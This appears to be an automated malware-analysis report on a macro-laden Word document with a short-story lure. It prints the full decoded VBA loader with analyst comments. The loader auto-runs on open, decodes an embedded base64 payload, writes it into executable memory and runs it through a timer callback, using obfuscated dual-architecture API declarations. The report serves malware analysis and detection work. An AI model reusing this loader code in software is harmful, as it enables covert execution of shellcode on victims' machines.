MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious OLE document containing VBA macros, as indicated by the 'OLE_VBA_MACROS' heuristic and the ClamAV signature 'Doc.Dropper.Agent-6337050-0'. The document body is a short story about a talking lobster, which serves as the lure. The extracted macro (listing below) is not a downloader but a self-contained in-memory shellcode loader: Document_Open calls cothurnus, which takes the last 7,844 characters of the Name of the selected item in the UserForm control sadden.endamage, decodes them with catalectic.bandoleer (a per-byte subtraction of 4/3 on even/odd positions followed by standard base64) into 5,883 bytes, allocates a 9,761-byte PAGE_EXECUTE_READWRITE region with NtAllocateVirtualMemory, copies the bytes in with NtWriteVirtualMemory and executes them through a CreateTimerQueueTimer callback at region base + 2064 (x64) or + 4240 (x86). Both architectures are covered by obfuscated #If Win64 blocks; in ATT&CK terms the native-API use also maps to T1106. The macro contains no URL and no network call, so whether the shellcode itself fetches a further stage cannot be determined from this listing. Obfuscation consists of dictionary-word identifiers, constants written as arithmetic, discarded Pmt() calls, song-lyric comments and unused decoy API declarations (AcquireSRWLockShared, GetOverlappedResult, NtCreateEventPair).
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6337050-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6337050-0
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro (auto-executes when the document is opened). Matched line in script: `Private Sub Document_Open()` followed by `Dim hallow As Integer`.
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All URLs listed here were found in the document text (OLE body) and none appears in the extracted macro, which performs no network access. URL http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml — in document text (OLE body); consistent with the short-story lure text. The remaining entries are standard XMP/RDF/Dublin Core and DrawingML namespace identifiers from embedded image/drawing metadata, not contact points.
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12735 bytes | adf3395cf06caae98fee1a817afda098d7852c6180ea430cdb25cee605c05b8c |
Preview script — first 1,000 lines of the extracted script (the listing below is shorter than that, so it is the complete decoded source of the three modules: ThisDocument, catalectic and the UserForm sadden).
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note (review): stage-1 driver, invoked from Document_Open.
' Pulls a base64 string out of the UserForm control sadden.endamage,
' decodes it (catalectic.bandoleer), copies the bytes into fresh RWX
' memory (supposition) and executes them through a timer-queue callback
' (tael = CreateTimerQueueTimer).  Nothing here downloads anything: the
' payload is embedded in the document.  No Option Explicit is present,
' so the many undeclared names are Variants; most assignments below are
' dead stores and only the annotated lines matter.
Sub cothurnus()
Dim anarchist As Byte
Dim confession As String
' Sets the control's Value to 5 (Day(#12/5/2013#)); what that does
' depends on the control type, which is not visible in this listing.
sadden.endamage.Value = Day(#12/5/2013#)
varday = baldachino = "abasia"
particulars = "barbuda"
picked = "erewhile"
rainy = "cowpens"
sounding = "lir"
' damascus is never defined in the listing -> Empty.
hydrocarbon = damascus
attrited = "effortlessly"
handover = "precursor"
' The selected item's Name carries the encoded payload (see oder below).
Set calluna = sadden.endamage.SelectedItem
cathode = 67
restrictive = 2086
pertusion = 480783
' Pmt(...) with the result discarded: junk filler repeated throughout
' the sample; no effect on the loader.
Pmt 0, cathode, 36647, 33477, 4
oder = calluna.Name
bombard = 7844
' Last 7844 characters = the base64 text (7844 / 4 * 3 = 5883 bytes,
' exactly the size later written into the RWX region in supposition).
lasagna = Right(oder, bombard)
' Decode to raw bytes; bandoleer returns them packed in a String.
floats = catalectic.bandoleer(lasagna)
rabid = 64
scath = 34877
canicula = 179544
Pmt 0, rabid, 30046, 10076, 5
ostrogoth = "semiliterate"
' Obfuscated "#If Win64": 21 > 5 is always True, so this reduces to
' Win64 > 0 (64-bit host).  The next block is its "Not Win64" twin.
#If (8 * 2 + 5) > (7 - 2 * 1) And Win64 > (21 - 7 * 3) * 2 Then
Dim nautilus As Long
Dim extenuating As LongPtr
Dim squaretoed As LongPtr
Dim wellfed As String
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim preshow As Long
Dim squaretoed As Long
Dim nominated As Long
Dim extenuating As Long
#End If
catostomidae = 14 - 241 + 227
subtilization = "arminian"
battleax = 4096
ayudante = 103
augmentation = 13436
uncritical = 386789
Pmt 0, ayudante, 16176, 26463, 3
sightless = "tremellaceae"
Arrange = "mainstreamed"
pikeperch = "dasypodidae"
' monotonous is never defined in the listing -> Empty.
banished = monotonous
battleful = 68
enemy = 20489
mailsorter = 529276
Pmt 0, battleful, 14071, 41127, 8
prate = floats
' clough is never defined in the listing -> Empty.
afghanistan = clough
annotation = "peg"
' supposition allocates RWX memory, copies the decoded bytes into it
' and returns the region base address.
extenuating = supposition(prate)
adenine = "cretinism"
narrowmindedness = "posthumously"
' x64: callback offset elegy = 22 - 152 + 2194 = 2064.
#If (6 * 3 + 5) > (7 - 2 * 1) And Win64 > (48 - 6 * 8) * 2 Then
Dim casque As Variant
Dim noncontent As LongPtr
Dim elastomer As LongPtr
Dim actually As LongPtr
elegy = 22 - 152 + 2194
#End If
' x86: callback offset elegy = (44 + 737) + 3459 = 4240.
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim noncontent As Long
fanlike = 44 + 737
Dim elastomer As Long
Dim actually As Long
elegy = fanlike + 3459
#End If
Dim bundle As Variant
Dim spontaneously As Byte
noncontent = 0
' Entry point inside the decoded blob = region base + per-arch offset.
squaretoed = extenuating + elegy
elastomer = 201527
' actually = 3500; assigned but never used.
actually = 34 + 74 + 3392
' tael = CreateTimerQueueTimer.  Per the Win32 signature the arguments
' are: phNewTimer = elastomer (ByRef, receives the handle), TimerQueue = 0
' (default queue), Callback = squaretoed, Parameter = 0, DueTime = 0,
' Period = 0, Flags = 0 -> the callback, i.e. the shellcode, runs at
' once on a thread-pool thread.  The return value is never checked.
sharpener = tael(elastomer, noncontent, squaretoed, noncontent, noncontent, noncontent, noncontent)
stow = 119
blathering = 8821
bickerstaff = 515573
Pmt 0, stow, 10328, 36975, 2
End Sub
' Analyst note (review): auto-execution entry point (OLE_VBA_DOCOPEN).
' Runs when the document is opened with macros enabled; the only real
' work is the call to cothurnus.  Everything else is filler: coarse is
' never defined in the listing (so amoebean becomes Empty) and the Pmt
' result is discarded.
Private Sub Document_Open()
Dim hallow As Integer
Dim clipboard As Integer
amoebean = coarse
' Stage-1 loader: decode embedded payload, map it RWX, run it.
cothurnus
consumption = 86
attenuated = 2416
huckster = 498194
Pmt 0, consumption, 3508, 17165, 8
End Sub
' Analyst note (review): allocates an RWX region in the current process,
' copies the decoded payload (hornfels, a Variant holding the bytes as a
' String) into it and returns the region base address (memo).
' coggery(dst, src, len) wraps NtWriteVirtualMemory on the current
' process; cannabis is NtAllocateVirtualMemory.  No NTSTATUS is checked.
Function supposition(hornfels)
Dim crossbred As Variant
Dim deerstalking As Integer
Dim wisdom As String
' Obfuscated "#If Win64" (33 > 5 is always True): silkscreen = 8, the
' x64 pointer size.
#If (7 * 4 + 5) > (7 - 2 * 1) And Win64 > (20 - 5 * 4) * 2 Then
Dim bigotry As Byte
Dim boxwood As LongPtr
silkscreen = 12 - 4
Dim memo As LongPtr
Dim misrepresent As Long
Dim biaxial As Integer
Dim preoccupation As LongPtr
Dim arrish As Long
#End If
' x86 twin: silkscreen = 197 + 36 - 229 = 4, the x86 pointer size.
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim boxwood As Long
silkscreen = 197 + 36 - 229
Dim memo As Long
Dim preoccupation As Long
#End If
fregatidae = VarPtr(boxwood)
' NtWriteVirtualMemory(-1, &boxwood, VarPtr(hornfels) + 8, pointer-size):
' copies the pointer stored 8 bytes into the Variant that wraps hornfels
' into boxwood.  Presumably this is the BSTR data pointer of the decoded
' buffer, i.e. the address of the raw payload bytes -- confirm against
' the VARIANT layout on the target build.
interfacial = coggery(fregatidae, VarPtr(hornfels) + 8, silkscreen)
' NtAllocateVirtualMemory parameters, all as arithmetic/literals:
'   cline = -1            ProcessHandle (current process)
'   memo = 0              BaseAddress (ByRef; receives the new base)
'   coordinator = 0       ZeroBits
'   preoccupation = 9761  RegionSize (ByRef)
'   hornets = 4096        AllocationType = 0x1000 (MEM_COMMIT)
'   evenness = 64         Protect = 0x40 (PAGE_EXECUTE_READWRITE)
cline = -1
memo = 96 - 96
coordinator = 20 - 82 + 62
preoccupation = 9761
hornets = 95 + 49 + 3952
evenness = 64
drygoods = cannabis(ByVal cline, memo, ByVal coordinator, preoccupation, ByVal hornets, ByVal evenness)
' Self-assignment: no-op filler.
centunculus = centunculus
matchbox = Math.Round(268)
' NtWriteVirtualMemory(-1, memo, boxwood, 5883): copy the 5883 decoded
' payload bytes into the freshly allocated RWX region.
coggery memo, boxwood, 5883
athetosis = 13
expending = 22850
homoerotic = 461069
Pmt 0, athetosis, 29510, 33595, 5
' Return the RWX region base; cothurnus adds the per-arch entry offset.
supposition = memo
End Function
' Analyst note (review): thin wrapper around keurboom = NtWriteVirtualMemory
' for the current process:
'   describable -> BaseAddress (destination)
'   adhibition  -> Buffer (source)
'   hepatitis   -> NumberOfBytesToWrite
' auditorium = 126 + 62 - 189 = -1 is the pseudo-handle for the current
' process.  hollandaise is a never-assigned Long passed ByVal, so the API
' receives 0 (NULL) for NumberOfBytesWritten.  The Function never assigns
' its own return value (callers get Empty) and the NTSTATUS from keurboom
' is discarded, so write failures are silent.
Function coggery(describable, adhibition, hepatitis)
' Obfuscated "#If Win64" (17 > 3 is always True): LongPtr locals on x64.
#If (3 * 4 + 5) > (5 - 2 * 1) And Win64 > (8 - 4 * 2) * 2 Then
Dim locomotion As String
Dim prescious As Variant
Dim auditorium As LongPtr
Dim inimical As LongPtr
Dim hollandaise As LongPtr
Dim anhedonia As Integer
Dim sarcostemma As LongPtr
Dim exploded As LongPtr
#End If
' x86 twin: plain Long locals.
#If (8 * 2 + 5) > (7 - 2 * 1) And Not Win64 > (21 - 7 * 3) * 2 Then
Dim inimical As Long
Dim soit As Variant
Dim auditorium As Long
Dim tibicen As Variant
Dim sarcostemma As Long
Dim screaming As Variant
Dim hollandaise As Long
Dim homoerotic As String
Dim exploded As Long
Dim mugient As Byte
Dim nuture As Byte
#End If
matchbox = Fix(378)
epilepsy = "truant"
inimical = describable
exploded = hepatitis
centunculus = centunculus
sarcostemma = adhibition
flammae = 25
exist = 33293
abronia = 461481
Pmt 0, flammae, 22212, 47908, 2
centunculus = "heddle"
' -1 = current-process pseudo-handle.
auditorium = 126 + 62 - 189
' NtWriteVirtualMemory(-1, dst, src, len, NULL); all params ByVal As Any.
keurboom ByVal auditorium, inimical, sarcostemma, exploded, hollandaise
epilepsy = "bemoan"
End Function
' Analyst note (review): benign view-layout code that is not called from
' Document_Open or cothurnus; presumably leftover or decoy.  It hard-codes
' the document name "Sample.doc", which is worth noting when correlating
' with the filename the sample was delivered under.
Sub zoom()
With Documents("Sample.doc").Windows(1).View
.Type = wdPrintView
With .zoom
.PageColumns = 3
.PageRows = 2
End With
End With
End Sub
Attribute VB_Name = "catalectic"
' Analyst note (review): API imports for the loader, in a 32-bit block and
' a 64-bit (PtrSafe/LongPtr) block selected by obfuscated Win64 tests.
' Only cannabis (NtAllocateVirtualMemory), keurboom (NtWriteVirtualMemory)
' and tael (CreateTimerQueueTimer) are called anywhere in this listing;
' the remaining declarations (AcquireSRWLockShared, GetOverlappedResult,
' NtCreateEventPair) are never used and look like padding or decoys.
' Note the trailing space inside the Lib strings ("Ntdll.dll ",
' "Shlwapi.dll "), possibly there to defeat naive string matching on the
' DLL name -- detection rules should not anchor on the exact string.
' The song-lyric comments are the sample's original filler and are left
' in place.
' Knew it was gonna be a long night
' I was doing alright
' We locked eyes over whiskey on ice
' 32-bit branch: 6 > 5 is always True, so this is Not (0 < Win64).
#If (16 / 4 + 2) > (7 - 2 * 1) And Not (32 / 8 - 1 * 4) * 2 < Win64 Then
' And hit me like a hurricane
' dowry = AcquireSRWLockShared: declared, never called.
Public Declare Function dowry Lib "Ntdll.dll " Alias "AcquireSRWLockShared" (asphyxiating As Any) As Long
' The moon went hiding, stars quit shining
' And walked out
' cannabis = NtAllocateVirtualMemory: used in supposition to get RWX memory.
Public Declare Function cannabis Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (actinomycin As Long, stockcar As Long, ByVal flirt As Long, avaramByVal As Long, gnashing As Long, ByVal sheeptick As Long) As Long
' I wouldnt be in my truck
' Knew it was gonna be a long night
' kinfolk = GetOverlappedResult, declared from Shlwapi.dll although it is
' documented as a kernel32 export; never called -- consistent with a decoy.
Public Declare Function kinfolk Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal contemporation As Any, brassia As Any, misericordiam As Any, cordaitales As Any) As Long
' Rain was driving, thunder, lightning
' And hit me like a hurricane
' tael = CreateTimerQueueTimer: the execution primitive (callback = shellcode).
Public Declare Function tael Lib "Kernel32" Alias "CreateTimerQueueTimer" (submerge As Any, ByVal blebbed As Any, ByVal balneal As Any, ByVal dugout As Any, ByVal restful As Any, ByVal fastener As Any, ByVal ben As Any) As Long
' I was doing alright
' I wouldnt be in my truck
' keurboom = NtWriteVirtualMemory: used via coggery to copy the payload.
Public Declare Function keurboom Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal strongsmelling As Any, ByVal astrophysicist As Any, ByVal windblown As Any, ByVal untidy As Any, ByVal hartebeest As Any) As Long
' I was doing alright
' The moon went hiding, stars quit shining
#End If
' From the moment when
' If I woulda just layed my drink down
' 64-bit branch: 8 > 5 is always True, so this is Win64 > 0.
#If (12 / 4 + 5) > (7 - 2 * 1) And Win64 > (15 - 5 * 3) * 2 Then
' And hit me like a hurricane
' Rain was driving, thunder, lightning
' keurboom = NtWriteVirtualMemory (x64 flavour, LongPtr return).
Public Declare PtrSafe Function keurboom Lib "ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal assimilable As Any, ByVal gomashta As Any, ByVal poles As Any, ByVal numerable As Any, ByVal airstream As Any) As LongPtr
' Started talking bout us again
' And walked out
' twineth = GetOverlappedResult from Shlwapi.dll: never called (decoy).
Public Declare PtrSafe Function twineth Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal arborary As Any, berkeley As Any, brazenly As Any, bouyei As Any) As LongPtr
' Then you rolled in with your hair in the wind
' Hit me like a hurricane
' holdover = NtCreateEventPair: never called (decoy).
Public Declare PtrSafe Function holdover Lib "ntdll.dll " Alias "NtCreateEventPair" (piecemeal As LongPtr, burrheaded As LongPtr, jibboom As LongPtr) As LongPtr
' But just your sight had my heart storming
' But just your sight had my heart storming
' astrometry = AcquireSRWLockShared: never called (decoy).
Public Declare PtrSafe Function astrometry Lib "ntdll.dll " Alias "AcquireSRWLockShared" (confessional As Any) As LongPtr
' But just your sight had my heart storming
' Rain was driving, thunder, lightning
' tael = CreateTimerQueueTimer (x64 flavour; return still declared As Long).
Public Declare PtrSafe Function tael Lib "Kernel32" Alias "CreateTimerQueueTimer" (exportable As Any, ByVal cynanche As Any, ByVal formalist As Any, ByVal absolver As Any, ByVal delphi As Any, ByVal considered As Any, ByVal megadermatidae As Any) As Long
' The moon went hiding, stars quit shining
' But just your sight had my heart storming
' cannabis = NtAllocateVirtualMemory (x64 flavour, LongPtr parameters).
Public Declare PtrSafe Function cannabis Lib "ntdll.dll " Alias _
"NtAllocateVirtualMemory" (endometrial As LongPtr, accidentalness As LongPtr, ByVal macroscopically As LongPtr, anticlimacticByVal As LongPtr, berate As LongPtr, ByVal immunofluorescence As LongPtr) As LongPtr
' Knew it was gonna be a long night
' If I woulda just layed my drink down
#End If
' Driving us to your house
' The moon went hiding, stars quit shining
' Analyst note (review): payload decoder.  Three steps:
'   1. StrConv(foreground, 128) (vbFromUnicode) -> one byte per character.
'   2. Subtract 4 from bytes at even indices and 3 from bytes at odd
'      indices (bulbar = vbKeyShift - 12 = 16 - 12 = 4), recovering the
'      base64 text.
'   3. Standard base64 decode using the alphabet table from cavia():
'      4 characters -> 24-bit value -> 3 bytes.
' The loop bound pythoninae = 7843 fixes the input at 7844 characters,
' giving 5883 output bytes in curiousness(0 To 6962).  The byte array is
' returned as a String, so the String's buffer carries the raw bytes.
' angiologist(a, b, 43) is a * b, (.., 35) is a And b, (.., 25) is a \ b.
' Most other assignments are dead stores or filler.
Function bandoleer(foreground) As String
Dim incommode As Variant
Dim antefix As Long
Dim aerobe(63) As Long
Dim buchloe() As Byte
Dim personable As Long
Dim than As Integer
Dim firstclass As String
Dim slowdown(63) As Long
epilepsy = "agelessness"
Dim healthfulness As Byte
Dim unconfident(63) As Long
' gaberlunzie is never defined in the listing -> Empty / 340 = 0.
clairvoyant = gaberlunzie / 340
Dim psilophytaceae As Long
Dim naughty As Long
Dim curiousness(6962) As Byte
Dim referee As Long
Dim forbid As Integer
centunculus = epilepsy
' Base64 weights and masks, written as plain or arithmetic constants:
'   claiming   = 64      (2^6,  weight of the 3rd sextet)
'   metage     = 256     (divisor for the middle byte)
'   brevis     = 262144  (2^18, weight of the 1st sextet)
'   geraniaceae = 255    (0xFF   mask, 3rd byte)
'   carbuncled = 16711680 (0xFF0000 mask, 1st byte)
'   arales     = 65280   (0xFF00 mask, 2nd byte)
'   chaqueta   = 65536   (divisor for the 1st byte)
'   house      = 4096    (2^12, weight of the 2nd sextet)
claiming = 64
metage = 256
brevis = 53 - 15 + 262106
eighty = 63
geraniaceae = 255
carbuncled = 16711680
biograph = 52 + 257996
arales = 65280
Dim elmos As Variant
Dim flux As String
chaqueta = 65536
bise = 28 - 77 + 4081
house = 57 + 4039
amentes = 63 + 25 + 16514984
Dim blowfly As Variant
Dim psophia As Byte
guilty = 0
erogenous = 7843
Dim mimosoideae() As Byte
Dim pokerish As Byte
Dim eliomys As String
' Step 1: Unicode string -> ANSI byte array.
mimosoideae = VBA.StrConv(foreground, 128)
Dim degradation As Byte
jackal = 40
victoriously = 36961
wedlock = 595163
' Pmt with discarded result: filler.
VBA.Financial.Pmt 0, jackal, 26970, 25307, 2
pythoninae = 7843
bulbar = vbKeyShift - 12
' Step 2: even index -> byte - 4, odd index -> byte - 3.
For dilleniidae = 0 To pythoninae
If dilleniidae Mod 2 = 0 Then
mimosoideae(dilleniidae) = mimosoideae(dilleniidae) - bulbar
Else
mimosoideae(dilleniidae) = mimosoideae(dilleniidae) - (bulbar - 1)
End If
Next dilleniidae
centurial = 110
flower = 29604
simulcast = 579874
VBA.Financial.Pmt 0, centurial, 14803, 22040, 2
than = 0
dishonorableness = 0
samaritan = 107 - 83 + 19
' Character -> sextet lookup table (standard base64 alphabet).
moneymaking = cavia
' Precomputed sextet weights: unconfident(i) = i*64, aerobe(i) = i*4096,
' slowdown(i) = i*262144, for i = 0..63.
For referee = (7 - 7) * 1 To (50 + 13) * (5 - 4)
unconfident(referee) = angiologist(referee, claiming, 43)
aerobe(referee) = angiologist(referee, house, 43)
slowdown(referee) = angiologist(referee, brevis, 43)
Next referee
decreased = 7
bigram = 7712
degrading = 228738
VBA.Financial.Pmt 0, decreased, 18467, 54400, 6
buchloe = mimosoideae
durance = 70 + 158 - 224
motorcycling = 7
moneybag = 2815
liana = 251779
VBA.Financial.Pmt 0, motorcycling, 25097, 37666, 6
nuncupative = 3
centunculus = "impossibly"
centunculus = "tortoise"
bizarrerie = nuncupative + 1
antiaircraft = 2
' Step 3: walk the text 4 characters at a time (the loop variable is
' bumped by 3 in the body plus 1 by Next) and emit 3 bytes per group.
For psilophytaceae = 0 To pythoninae
hardofhearing = buchloe(psilophytaceae)
singaporean = buchloe(psilophytaceae + 2)
chaste = aerobe(moneymaking(buchloe(psilophytaceae + 1)))
closeness = unconfident(moneymaking(singaporean)) + moneymaking(buchloe(psilophytaceae + nuncupative))
' personable = c0<<18 + c1<<12 + c2<<6 + c3
personable = slowdown(moneymaking(hardofhearing)) + chaste + closeness
' byte0 = (v And 0xFF0000) \ 65536
referee = angiologist(personable, carbuncled, 35)
curiousness(antefix) = angiologist(referee, chaqueta, 25)
' byte1 = (v And 0xFF00) \ 256
referee = angiologist(personable, arales, 35)
curiousness(antefix + 1) = angiologist(referee, metage, 25)
' byte2 = v And 0xFF
curiousness(antefix + antiaircraft) = angiologist(personable, geraniaceae, 35)
antefix = antefix + antiaircraft + 1
psilophytaceae = psilophytaceae + 3
Next
' Byte array assigned to the String return: raw bytes, no re-encoding.
bandoleer = curiousness
End Function
' Analyst note (review): operator dispatcher used by bandoleer to hide
' the arithmetic of base64 decoding behind an opcode argument:
'   graze = 25  ((5*5)+(10/2-5))      -> ban \ mynheer  (integer divide)
'   graze = 35  ((5*7)+(5-3)/2-1)     -> ban And mynheer (bit mask)
'   graze = 43  ((40+3)+(56/7-4*2))   -> ban * mynheer
' Any other opcode leaves the result unassigned (Empty).
Function angiologist(ban, mynheer, graze)
Select Case graze
Case (5 * 5) + (10 / 2 - 5)
angiologist = ban \ mynheer
Case (5 * 7) + (5 - 3) / 2 - 1
angiologist = ban And mynheer
Case (40 + 3) + (56 / 7 - 4 * 2)
angiologist = ban * mynheer
End Select
End Function
' Analyst note (review): builds the 256-entry character -> sextet table
' for the standard base64 alphabet:
'   'A'..'Z' (65..90)  -> 0..25     (loop runs one past, to 91: harmless)
'   '0'..'9' (48..57)  -> 52..61    (loop runs one past, to 58: harmless)
'   'a'..'z' (97..122) -> 26..51    (loop runs one past, to 123: harmless)
'   '/' (47)           -> 63
'   '+' (43)           -> 62
' Every other byte maps to 0.  basket starts at 126 - 104 + 43 = 65.
Function cavia()
Dim susurration(255) As Byte
basket = 126 - 104 + 43
Do
susurration(basket) = basket - 65
basket = basket + 1
Loop While basket <= 90 + 1
basket = 48
Do
susurration(basket) = basket + 4
basket = basket + 1
Loop While basket <= 50 + 8
basket = 97
Do
susurration(basket) = basket - 71
basket = basket + 1
Loop While basket <= 120 + 3
susurration(47) = 63
basket = 43
susurration(basket) = 60 + 2
cavia = susurration
End Function
' Analyst note (review): AscW wrapper; not called anywhere in this listing.
Function clarion(cuckoo)
clarion = AscW(cuckoo)
End Function
Attribute VB_Name = "sadden"
Attribute VB_Base = "0{A8CD2D17-F177-49C6-A675-509D0E11F8B5}{33A3C4A6-6EA1-4CC7-9076-BB74C63EFCEB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Analyst note (review): UserForm module with no code of its own.
' cothurnus reads sadden.endamage.SelectedItem.Name, so the encoded
' payload is presumably stored in this form's control data rather than in
' the VBA source -- confirm by extracting the form storage separately.